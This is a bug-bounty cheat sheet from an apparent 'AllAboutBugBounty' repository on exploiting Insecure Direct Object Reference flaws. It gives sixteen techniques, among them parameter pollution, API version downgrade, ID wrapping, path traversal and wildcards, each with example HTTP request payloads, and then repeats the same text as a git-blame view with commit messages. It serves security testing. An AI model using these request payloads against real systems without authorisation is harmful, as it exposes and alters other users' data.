AllAboutBugBounty/Insecure Direct Object Refe...

# Insecure Direct Object Reference (IDOR)

## Introduction
IDOR stands for Insecure Direct Object Reference is a security vulnerability in which a user is able to access and make changes to data of any other user present in the system.

## Where to find
- Usually it can be found in APIs.
- Check the HTTP request that contain unique ID, for example `user_id` or `id`

## How to exploit
1. Add parameters onto the endpoints for example, if there was
```
GET /api/v1/getuser HTTP/1.1
Host: example.com
...
```
Try this to bypass
```
GET /api/v1/getuser?id=1234 HTTP/1.1
Host: example.com
...
```

2. HTTP Parameter pollution
```
POST /api/get_profile HTTP/1.1
Host: example.com
...

user_id=hacker_id&user_id=victim_id
```

3. Add .json to the endpoint
```
GET /v2/GetData/1234 HTTP/1.1
Host: example.com
...
```
Try this to bypass
```
GET /v2/GetData/1234.json HTTP/1.1
Host: example.com
...
```

4. Test on outdated API Versions
```
POST /v2/GetData HTTP/1.1
Host: example.com
...

id=123
```
Try this to bypass
```
POST /v1/GetData HTTP/1.1
Host: example.com
...

id=123
```

5. Wrap the ID with an array.
```
POST /api/get_profile HTTP/1.1
Host: example.com
...

{"user_id":111}
```
Try this to bypass
```
POST /api/get_profile HTTP/1.1
Host: example.com
...

{"id":[111]}
```

6. Wrap the ID with a JSON object
```
POST /api/get_profile HTTP/1.1
Host: example.com
...

{"user_id":111}
```
Try this to bypass
```
POST /api/get_profile HTTP/1.1
Host: example.com
...

{"user_id":{"user_id":111}}
```

7. JSON Parameter Pollution
```
POST /api/get_profile HTTP/1.1
Host: example.com
...

{"user_id":"hacker_id","user_id":"victim_id"}
```

8. Try decode the ID, if the ID encoded using md5,base64,etc
```
GET /GetUser/dmljdGltQG1haWwuY29t HTTP/1.1
Host: example.com
...
```
dmljdGltQG1haWwuY29t => victim@mail.com

9. If the website using GraphQL, try to find IDOR using GraphQL
```
GET /graphql HTTP/1.1
Host: example.com
...
```
```
GET /graphql.php?query= HTTP/1.1
Host: example.com
...
```

10.  MFLAC (Missing Function Level Access Control)
```
GET /admin/profile HTTP/1.1
Host: example.com
...
```
Try this to bypass
```
GET /ADMIN/profile HTTP/1.1
Host: example.com
...
```

11. Try to swap uuid with number
```
GET /file?id=90ri2-xozifke-29ikedaw0d HTTP/1.1
Host: example.com
...
```
Try this to bypass
```
GET /file?id=302
Host: example.com
...
```

12. Change HTTP Method
```
GET /api/v1/users/profile/111 HTTP/1.1
Host: example.com
...
```
Try this to bypass
```
POST /api/v1/users/profile/111 HTTP/1.1
Host: example.com
...
```

13. Path traversal
```
GET /api/v1/users/profile/victim_id HTTP/1.1
Host: example.com
...
```
Try this to bypass
```
GET /api/v1/users/profile/my_id/../victim_id HTTP/1.1
Host: example.com
...
```

14. Change request `Content-Type`
```
GET /api/v1/users/1 HTTP/1.1
Host: example.com
Content-type: application/xml
```
Try this to bypass
```
GET /api/v1/users/2 HTTP/1.1
Host: example.com
Content-type: application/json
```

15. Send wildcard instead of ID
```
GET /api/users/111 HTTP/1.1
Host: example.com
```
Try this to bypass
```
GET /api/users/* HTTP/1.1
Host: example.com
```
```
GET /api/users/% HTTP/1.1
Host: example.com
```
```
GET /api/users/_ HTTP/1.1
Host: example.com
```
```
GET /api/users/. HTTP/1.1
Host: example.com
```
16. Try google dorking to find new endpoint

## References 
* [@swaysThinking](https://twitter.com/swaysThinking) and other medium writeup
Grouping, adding recon and some tips 2021-02-09 02:15:31 +00:00			`# Insecure Direct Object Reference (IDOR)`

Update structure each readme 2022-06-15 10:38:42 +00:00			`## Introduction`
Grouping, adding recon and some tips 2021-02-09 02:15:31 +00:00			`IDOR stands for Insecure Direct Object Reference is a security vulnerability in which a user is able to access and make changes to data of any other user present in the system.`

Add 'Where to find' in each readme, add Apache + CRLF + RFI 2022-06-22 04:41:21 +00:00			`## Where to find`
			`- Usually it can be found in APIs.`
			- Check the HTTP request that contain unique ID, for example `user_id` or `id`

			`## How to exploit`
Account Takover [1] Create account IDOR (Insecure direct object references) tips and add 9 tips 2020-09-04 10:41:20 +00:00			`1. Add parameters onto the endpoints for example, if there was`
Grouping, adding recon and some tips 2021-02-09 02:15:31 +00:00			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`GET /api/v1/getuser HTTP/1.1`
			`Host: example.com`
			`...`
Account Takover [1] Create account IDOR (Insecure direct object references) tips and add 9 tips 2020-09-04 10:41:20 +00:00			```
			`Try this to bypass`
Grouping, adding recon and some tips 2021-02-09 02:15:31 +00:00			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`GET /api/v1/getuser?id=1234 HTTP/1.1`
			`Host: example.com`
			`...`
Account Takover [1] Create account IDOR (Insecure direct object references) tips and add 9 tips 2020-09-04 10:41:20 +00:00			```

			`2. HTTP Parameter pollution`
Grouping, adding recon and some tips 2021-02-09 02:15:31 +00:00			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`POST /api/get_profile HTTP/1.1`
			`Host: example.com`
			`...`

Account Takover [1] Create account IDOR (Insecure direct object references) tips and add 9 tips 2020-09-04 10:41:20 +00:00			`user_id=hacker_id&user_id=victim_id`
			```

			`3. Add .json to the endpoint`
Grouping, adding recon and some tips 2021-02-09 02:15:31 +00:00			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`GET /v2/GetData/1234 HTTP/1.1`
			`Host: example.com`
			`...`
Account Takover [1] Create account IDOR (Insecure direct object references) tips and add 9 tips 2020-09-04 10:41:20 +00:00			```
			`Try this to bypass`
Grouping, adding recon and some tips 2021-02-09 02:15:31 +00:00			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`GET /v2/GetData/1234.json HTTP/1.1`
			`Host: example.com`
			`...`
Account Takover [1] Create account IDOR (Insecure direct object references) tips and add 9 tips 2020-09-04 10:41:20 +00:00			```

			`4. Test on outdated API Versions`
Grouping, adding recon and some tips 2021-02-09 02:15:31 +00:00			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`POST /v2/GetData HTTP/1.1`
			`Host: example.com`
			`...`

Account Takover [1] Create account IDOR (Insecure direct object references) tips and add 9 tips 2020-09-04 10:41:20 +00:00			`id=123`
			```
			`Try this to bypass`
Grouping, adding recon and some tips 2021-02-09 02:15:31 +00:00			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`POST /v1/GetData HTTP/1.1`
			`Host: example.com`
			`...`

Account Takover [1] Create account IDOR (Insecure direct object references) tips and add 9 tips 2020-09-04 10:41:20 +00:00			`id=123`
			```

			`5. Wrap the ID with an array.`
Grouping, adding recon and some tips 2021-02-09 02:15:31 +00:00			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`POST /api/get_profile HTTP/1.1`
			`Host: example.com`
			`...`

Account Takover [1] Create account IDOR (Insecure direct object references) tips and add 9 tips 2020-09-04 10:41:20 +00:00			`{"user_id":111}`
			```
			`Try this to bypass`
Grouping, adding recon and some tips 2021-02-09 02:15:31 +00:00			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`POST /api/get_profile HTTP/1.1`
			`Host: example.com`
			`...`

Account Takover [1] Create account IDOR (Insecure direct object references) tips and add 9 tips 2020-09-04 10:41:20 +00:00			`{"id":[111]}`
			```

			`6. Wrap the ID with a JSON object`
Grouping, adding recon and some tips 2021-02-09 02:15:31 +00:00			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`POST /api/get_profile HTTP/1.1`
			`Host: example.com`
			`...`

Account Takover [1] Create account IDOR (Insecure direct object references) tips and add 9 tips 2020-09-04 10:41:20 +00:00			`{"user_id":111}`
			```
			`Try this to bypass`
Grouping, adding recon and some tips 2021-02-09 02:15:31 +00:00			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`POST /api/get_profile HTTP/1.1`
			`Host: example.com`
			`...`

Account Takover [1] Create account IDOR (Insecure direct object references) tips and add 9 tips 2020-09-04 10:41:20 +00:00			`{"user_id":{"user_id":111}}`
			```

			`7. JSON Parameter Pollution`
Grouping, adding recon and some tips 2021-02-09 02:15:31 +00:00			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`POST /api/get_profile HTTP/1.1`
			`Host: example.com`
			`...`

Account Takover [1] Create account IDOR (Insecure direct object references) tips and add 9 tips 2020-09-04 10:41:20 +00:00			`{"user_id":"hacker_id","user_id":"victim_id"}`
			```

			`8. Try decode the ID, if the ID encoded using md5,base64,etc`
Grouping, adding recon and some tips 2021-02-09 02:15:31 +00:00			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`GET /GetUser/dmljdGltQG1haWwuY29t HTTP/1.1`
			`Host: example.com`
			`...`
Account Takover [1] Create account IDOR (Insecure direct object references) tips and add 9 tips 2020-09-04 10:41:20 +00:00			```
			`dmljdGltQG1haWwuY29t => victim@mail.com`

Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`9. If the website using GraphQL, try to find IDOR using GraphQL`
Grouping, adding recon and some tips 2021-02-09 02:15:31 +00:00			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`GET /graphql HTTP/1.1`
			`Host: example.com`
			`...`
Account Takover [1] Create account IDOR (Insecure direct object references) tips and add 9 tips 2020-09-04 10:41:20 +00:00			```
Grouping, adding recon and some tips 2021-02-09 02:15:31 +00:00			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`GET /graphql.php?query= HTTP/1.1`
			`Host: example.com`
			`...`
Account Takover [1] Create account IDOR (Insecure direct object references) tips and add 9 tips 2020-09-04 10:41:20 +00:00			```
IDOR [3] Add sources of the tips 2020-09-04 10:46:10 +00:00
Grouping, adding recon and some tips 2021-02-09 02:15:31 +00:00			`10. MFLAC (Missing Function Level Access Control)`
IDOR [4] Add 1 IDOR tips 2020-09-09 15:01:15 +00:00			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`GET /admin/profile HTTP/1.1`
			`Host: example.com`
			`...`
IDOR [4] Add 1 IDOR tips 2020-09-09 15:01:15 +00:00			```
			`Try this to bypass`
			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`GET /ADMIN/profile HTTP/1.1`
			`Host: example.com`
			`...`
IDOR [4] Add 1 IDOR tips 2020-09-09 15:01:15 +00:00			```

Added uuid bypass 2021-02-09 13:58:04 +00:00			`11. Try to swap uuid with number`
			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`GET /file?id=90ri2-xozifke-29ikedaw0d HTTP/1.1`
			`Host: example.com`
			`...`
Added uuid bypass 2021-02-09 13:58:04 +00:00			```
			`Try this to bypass`
			```
			`GET /file?id=302`
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`Host: example.com`
			`...`
Added uuid bypass 2021-02-09 13:58:04 +00:00			```

Update Insecure Direct Object References.md 2021-06-24 23:13:39 +00:00			`12. Change HTTP Method`
			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`GET /api/v1/users/profile/111 HTTP/1.1`
			`Host: example.com`
			`...`
Update Insecure Direct Object References.md 2021-06-24 23:13:39 +00:00			```
			`Try this to bypass`
			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`POST /api/v1/users/profile/111 HTTP/1.1`
			`Host: example.com`
			`...`
Update Insecure Direct Object References.md 2021-06-24 23:13:39 +00:00			```

			`13. Path traversal`
			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`GET /api/v1/users/profile/victim_id HTTP/1.1`
			`Host: example.com`
			`...`
Update Insecure Direct Object References.md 2021-06-24 23:13:39 +00:00			```
			`Try this to bypass`
			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`GET /api/v1/users/profile/my_id/../victim_id HTTP/1.1`
			`Host: example.com`
			`...`
Update Insecure Direct Object References.md 2021-06-24 23:13:39 +00:00			```

Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			14. Change request `Content-Type`
Update Insecure Direct Object References.md 2021-06-24 23:13:39 +00:00			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`GET /api/v1/users/1 HTTP/1.1`
			`Host: example.com`
Update Insecure Direct Object References.md 2021-06-24 23:13:39 +00:00			`Content-type: application/xml`
			```
			`Try this to bypass`
			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`GET /api/v1/users/2 HTTP/1.1`
			`Host: example.com`
Update Insecure Direct Object References.md 2021-06-24 23:13:39 +00:00			`Content-type: application/json`
			```

			`15. Send wildcard instead of ID`
			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`GET /api/users/111 HTTP/1.1`
			`Host: example.com`
Update Insecure Direct Object References.md 2021-06-24 23:13:39 +00:00			```
			`Try this to bypass`
			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`GET /api/users/* HTTP/1.1`
			`Host: example.com`
			```
			```
			`GET /api/users/% HTTP/1.1`
			`Host: example.com`
			```
			```
			`GET /api/users/_ HTTP/1.1`
			`Host: example.com`
			```
			```
			`GET /api/users/. HTTP/1.1`
			`Host: example.com`
Update Insecure Direct Object References.md 2021-06-24 23:13:39 +00:00			```
			`16. Try google dorking to find new endpoint`

Update structure each readme 2022-06-15 10:38:42 +00:00			`## References`
			`* [@swaysThinking](https://twitter.com/swaysThinking) and other medium writeup`